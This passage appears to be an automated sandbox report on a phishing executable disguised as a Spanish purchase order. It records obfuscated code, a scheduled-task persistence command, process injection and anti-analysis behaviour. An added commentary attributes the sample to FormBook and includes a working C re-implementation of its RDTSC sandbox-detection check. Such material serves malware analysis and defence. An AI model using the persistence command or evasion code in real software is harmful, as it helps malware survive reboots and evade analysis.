          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, KR7mpiyPDHBbEyi5xw.cs High entropy of concatenated method names: 'ujQN1yJfYq', 'dWnNZYr3PZ', 'LD5NuPTvky', 'rALNLkJOyN', 'ymJNIUma8R', 'AL3N44TK3L', 'LcFNJXAxWW', 'FI6N6RTpoH', 'CXpNafqSkH', 'JxmNcRYfmi'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, Q6M94gYctVNtw3H796.cs High entropy of concatenated method names: 'eSYAWuceOp', 'WiJAQI2aBF', 'K9RAifD83i', 'YH5ANJeqdE', 'LtVAd9lWYU', 'wcFAVCSoEM', 'umjAO4N4LD', 'UclAD8xZOc', 'bR3AYpcmS4', 'e34AGrZWYt'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, TTQDNta7IG5WrwHC6T.cs High entropy of concatenated method names: 's3bhuRXyR0', 'eithL2aBl0', 'QevhHBqaYD', 'VEAhTm4GYx', 'eeBh0l0goF', 'pIshFchIdQ', 'CefhfeH1Kn', 'hfDhwyC7AS', 'f2XhP8KsRJ', 'WIqhqpYfoN'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, p6pIYykcilRMsV2VCx.cs High entropy of concatenated method names: 'Dispose', 'XfXpbRmaRT', 'Aum5TTPJwy', 'tlIMM1jWug', 'd7BpEe3VAW', 'qEApzdp7Lf', 'ProcessDialogKey', 'BgZ5l8CxrG', 'xs05pMipEr', 'loZ55Cl50k'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, rbUGKPdyxBn8XOMxeW.cs High entropy of concatenated method names: 'VgxpOMMvMu', 'rdEpDOVclU', 'JMdpGJencS', 'uHXp20uDol', 'vkUpIMvStN', 'bdAp4ck0se', 'cEVewwmfPwwxTThCZu', 'FwEnrbJdJHLESc6aRs', 'YiP9RC4wVQtAA37gt8', 'aGYppAeOlb'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, BX7Oh87HgOpmOCUgmK.csHigh entropy of concatenated method names: 'ugBVWkkpT5', 'H9NViAaiPK', 'NXTVdBEwwu', 'S52VODLvZb', 'JmdVDdsxhV', 'Tb8dKKbFtV', 'lo4dRvVNjp', 'MdWdnZib9o', 'NaudxNYFbc', 'zFudb1iBpx'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, gRDoByRGLPp6pfTSjP.csHigh entropy of concatenated method names: 'ToString', 'rvE4qvLY6R', 'khb4TYRw8f', 'H0L4tFaKsH', 'Cu640lWBg1', 'QXt4FTXLbl', 'faq4XOL1T3', 'hnn4f0ylIC', 'xhy4wTiiAu', 'T3W43XyVkB'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, FgUxusEcU0DJni7hio.csHigh entropy of concatenated method names: 'nHCapYxVtC', 'mEraA61SYy', 'XWUakQj45J', 'NsWaQRCgDD', 'ClSairB5Dr', 'dgMadBnIxb', 'lCmaVoISjm', 'rOk6nI3oYP', 'y5Z6xVBHMN', 'VDy6bUiUtv'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, MYu7nQer9A19NAow7R.csHigh entropy of concatenated method names: 'Ouh6HDTOKF', 'Sxi6TQJAW6', 'T9t6t3pEXO', 'vi960uLyjl', 'col6re3wNn', 'r8y6Fb1n02', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, pqLWAeIFMHg90ZR9dd.csHigh entropy of concatenated method names: 'SET6QHE2sp', 'Ukm6ivL5V9', 'Jd96NNTFdB', 'tfh6dnj0m0', 'J7x6VI8Elg', 'TVD6ORYDiJ', 'AZ56De0ZrW', 'XPP6YTVe6g', 'wKG6GUNRtT', 'xuh62DoTBG'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, H6UpB055KFgdieio2Y.csHigh entropy of concatenated method names: 'drcB3Gc4N', 'SV31xKnkg', 'XKyZZEGoW', 'wxwUFrNq3', 'EpDLfl0Oy', 'pE5eMtIv1', 'sQNNXVl5cJH0cTlllG', 'G4HsJbqZ7bhNUn5E2q', 'eU56dPrAY', 'Rf1crE3D0'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, ke8rrUqlPToXKD2OoAB.csHigh entropy of concatenated method names: 're1ag1DvMl', 'Gnga957x3S', 'PJnaBy5oA7', 'L3pa1By8oC', 'YJjamLcDft', 'M2yaZUGqtL', 'amJaUHNFq1', 'HJBauKGweV', 'e7OaLe7FM2', 'AHAaertwAW'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, lMbMGb1ov4L67EScwT.csHigh entropy of concatenated method names: 'qyjdmcq0nx', 'i6kdUKGeVh', 'MTONtnpNVT', 'CNhN0nCfRx', 'jFPNFAsiQp', 'EWJNXoj2Zx', 'JZLNfMxOVT', 'fj3NwtG5a6', 'fDGN35HXol', 'OUBNP6iDvL'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, p3BRIyqACRVJVwwLupF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KndcrtY3eQ', 'jhsc7B8UL4', 'JcIcoZUshU', 'Xh7cyWKkjg', 'J6ccKRjpX5', 'zajcR6UEjA', 'RZBcng6ekg'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, MVHEAJo8kttD6FRHt3.csHigh entropy of concatenated method names: 'SO1JxBf6Nc', 'NeHJEHN6IB', 'S7A6lQCogt', 'OGg6phFoGy', 'vVCJqMfBrG', 'yuhJs6X8pD', 'e1jJSOQwxg', 'DcxJrSLwD8', 'TrPJ7a8BvV', 'FDoJof6U6x'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, JvN7hpwJnm4gTu1HXw.csHigh entropy of concatenated method names: 'bg2ira8xAf', 'K9ii7C1WDr', 'GwiiobLimw', 'uZGiy4s6SX', 'IKGiKHxTNi', 'bOLiRq8jLr', 'ddKinNpVqw', 'R7pixb6DUs', 'hnwibfXYAV', 'UdQiEYkguV'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, At3TF1qqjpsJPSavYm6.csHigh entropy of concatenated method names: 'ToString', 'HI0cApWfGL', 'Ewrcko6NvW', 'GNMcWtoOw6', 'CdncQk0Fdu', 'rcyci85U5o', 'YSmcNQRqS7', 'DgAcd2OJZ9', 'KFs1ZmxmbbKSvWwlW5E', 'Dq7qesxY81p36jLv2Be'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, cZEEvxCghWIf3R5N2R.csHigh entropy of concatenated method names: 'KDbOgY8WIB', 'HQNO9vHDMx', 'w8sOBsgEUd', 'mGfO1X1IYu', 'OMqOmuBjNZ', 'CnwOZ9NEsZ', 'YfdOUTO7x3', 'c5ROut5dBa', 'A5uOL3jQ7U', 'gNHOep2Rrr'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, KcAG6fzCKy4Xjm1vtr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SUnahLSYhe', 'hATaIVV1OL', 'aULa4Jgq5Q', 'MItaJL3xAW', 'OwGa6xSpM1', 'egbaaK8N5G', 'VJCacMjo0o'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, iIt1ZQbm28ELpKbSuJ.csHigh entropy of concatenated method names: 'kf6OQPVlPC', 'ECcONJ1HSC', 'fpoOVedEWp', 'V7YVEeGnCZ', 'h0SVzaQSdG', 'iNxOluOAtZ', 'uiPOpp3gF9', 'HaqO5u4jDU', 'ypIOAVM4T0', 'iZkOkJIsWJ'
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe File created: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe

          Boot Survival

          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp"

          Hooking and other Techniques for Hiding and Protection

          Source: initial sample Icon embedded in binary file: icon matches a legit application icon: icon (2112).png
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exe  Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe  Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match  File source: Process Memory Space: Orden de compra 0307AR24.exe PID: 2572, type: MEMORYSTR
          Source: Yara match  File source: Process Memory Space: RggSaCWUvAyNK.exe PID: 7360, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\systray.exe  API/Special instruction interceptor: Address: 7FFDB442D324
          Source: C:\Windows\SysWOW64\systray.exe  API/Special instruction interceptor: Address: 7FFDB4430774
          Source: C:\Windows\SysWOW64\systray.exe  API/Special instruction interceptor: Address: 7FFDB442D944
          Source: C:\Windows\SysWOW64\systray.exe  API/Special instruction interceptor: Address: 7FFDB442D504
          Source: C:\Windows\SysWOW64\systray.exe  API/Special instruction interceptor: Address: 7FFDB442D544
          Source: C:\Windows\SysWOW64\systray.exe  API/Special instruction interceptor: Address: 7FFDB442D1E4
          Source: C:\Windows\SysWOW64\systray.exe  API/Special instruction interceptor: Address: 7FFDB4430154
          Source: C:\Windows\SysWOW64\systray.exe  API/Special instruction interceptor: Address: 7FFDB442D8A4
          Source: C:\Windows\SysWOW64\systray.exe  API/Special instruction interceptor: Address: 7FFDB442DA44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exe  RDTSC instruction interceptor: First address: 29D9904 second address: 29D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exe  RDTSC instruction interceptor: First address: 29D9B7E second address: 29D9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe  RDTSC instruction interceptor: First address: 2809904 second address: 280990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe  RDTSC instruction interceptor: First address: 2809B7E second address: 2809B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
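The six RDTSC interceptor hits above all show the same instruction pair (rdtsc; keep the low 32 bits of eax in ecx; rdtsc) at identical page offsets (…9904/…990A and …9B7E/…9B84) inside RegSvcs.exe, systray.exe and rundll32.exe, which is consistent with one injected code body relocated to three host processes. The C program below is an added illustration, not code from the report or from the sample: it reproduces that two-read measurement and wraps it in the decision logic such a check needs. The median step, the 1000-cycle threshold and the sample deltas in the test are assumptions; real samples hard-code their own magic numbers. A caveat for anyone relying on this as a detection heuristic: most hypervisors pass RDTSC through with TSC offsetting rather than trapping it, so the check mainly catches emulators and sandboxes that hook the instruction (which is exactly how it ended up in this report).

```c
/* Added example (not from the Joe Sandbox report or the FormBook sample):
 * re-implementation of the rdtsc-pair timing check seen in the intercepted
 * instruction sequence, plus decision logic that can be exercised offline.
 * Threshold and median smoothing are assumptions, not the sample's own code. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

#if defined(__x86_64__) || defined(__i386__) || defined(_M_X64) || defined(_M_IX86)
#  if defined(_MSC_VER)
#    include <intrin.h>
#  else
#    include <x86intrin.h>
#  endif
#  define HAVE_RDTSC 1
#else
#  define HAVE_RDTSC 0          /* non-x86 build: no time-stamp counter */
#endif

/* The intercepted sequence only keeps eax (low 32 bits) of each read; the
 * later subtraction wraps naturally, so a 32-bit rollover between reads
 * still yields the correct small delta. */
uint32_t delta_low32(uint32_t first, uint32_t second)
{
    return second - first;
}

/* One measurement: two back-to-back rdtsc reads, low 32 bits only. */
uint32_t rdtsc_pair_delta(void)
{
#if HAVE_RDTSC
    uint32_t first  = (uint32_t)__rdtsc();
    uint32_t second = (uint32_t)__rdtsc();
    return delta_low32(first, second);
#else
    return 0;
#endif
}

static int cmp_u32(const void *a, const void *b)
{
    uint32_t x = *(const uint32_t *)a, y = *(const uint32_t *)b;
    return (x > y) - (x < y);
}

/* Median of n deltas (sorts in place). A single interrupt or context switch
 * landing between the two reads inflates one sample; the median ignores it. */
uint32_t median_delta(uint32_t *deltas, size_t n)
{
    if (n == 0) return 0;
    qsort(deltas, n, sizeof deltas[0], cmp_u32);
    return deltas[n / 2];
}

/* 1 = "looks instrumented". On bare metal two adjacent rdtsc reads cost a
 * few dozen cycles; an emulator or a sandbox hooking RDTSC inflates that
 * into the thousands. The threshold is an assumption. */
int looks_instrumented(uint32_t *deltas, size_t n, uint32_t threshold)
{
    return median_delta(deltas, n) > threshold;
}

/* Collect n live measurements into out[]. */
void sample_rdtsc(uint32_t *out, size_t n)
{
    for (size_t i = 0; i < n; i++)
        out[i] = rdtsc_pair_delta();
}

int main(void)
{
    uint32_t live[64];
    sample_rdtsc(live, 64);
    uint32_t med = median_delta(live, 64);
    printf("median rdtsc pair delta: %u cycles -> %s\n", med,
           looks_instrumented(live, 64, 1000) ? "instrumented/emulated"
                                               : "bare-metal-like");
    return 0;
}
```

On a hooked sandbox the printed median is typically orders of magnitude above the bare-metal figure; on a modern hypervisor with TSC passthrough it usually is not, which is why this check alone is a weak sandbox tell.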
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe  Memory allocated: 2C80000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe  Memory allocated: 2DA0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe  Memory allocated: 4DA0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe  Memory allocated: 9070000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe  Memory allocated: A070000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe  Memory allocated: A280000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe  Memory allocated: B280000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe  Memory allocated: B6A0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe  Memory allocated: C6A0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe  Memory allocated: D6A0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe  Memory allocated: E6A0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe  Memory allocated: F6A0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe  Memory allocated: 106A0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe  Memory allocated: 116A0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Memory allocated: 10E0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Memory allocated: 2AB0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Memory allocated: 4AB0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Memory allocated: 8540000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Memory allocated: 6F00000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Memory allocated: 9540000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Memory allocated: A540000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Memory allocated: A900000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Memory allocated: B900000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Memory allocated: C900000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Memory allocated: DB70000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Memory allocated: EB70000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Memory allocated: FB70000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Memory allocated: 10B70000 memory reserve | memory write watch
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 9_2_00409AB0 rdtsc 9_2_00409AB0
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe  Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe  Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 3964
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 5427
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1545
          Source: C:\Windows\explorer.exe  Window / User API: threadDelayed 9852
          Source: C:\Windows\explorer.exe  Window / User API: foregroundWindowGot 815
          Source: C:\Windows\explorer.exe  Window / User API: foregroundWindowGot 804
          Source: C:\Windows\SysWOW64\systray.exe  Window / User API: threadDelayed 9837
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  API coverage: 1.6 %
          Source: C:\Windows\SysWOW64\systray.exe  API coverage: 2.2 %
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe TID: 508  Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296  Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196  Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300  Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\explorer.exe TID: 7948  Thread sleep count: 9852 > 30
          Source: C:\Windows\explorer.exe TID: 7948  Thread sleep time: -19704000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 7948  Thread sleep count: 87 > 30
          Source: C:\Windows\explorer.exe TID: 7948  Thread sleep time: -174000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe TID: 7408  Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 7700  Thread sleep count: 134 > 30
          Source: C:\Windows\SysWOW64\systray.exe TID: 7700  Thread sleep time: -268000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 7700  Thread sleep count: 9837 > 30
          Source: C:\Windows\SysWOW64\systray.exe TID: 7700  Thread sleep time: -19674000s >= -30000s
          Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exe  Last function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exe  Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
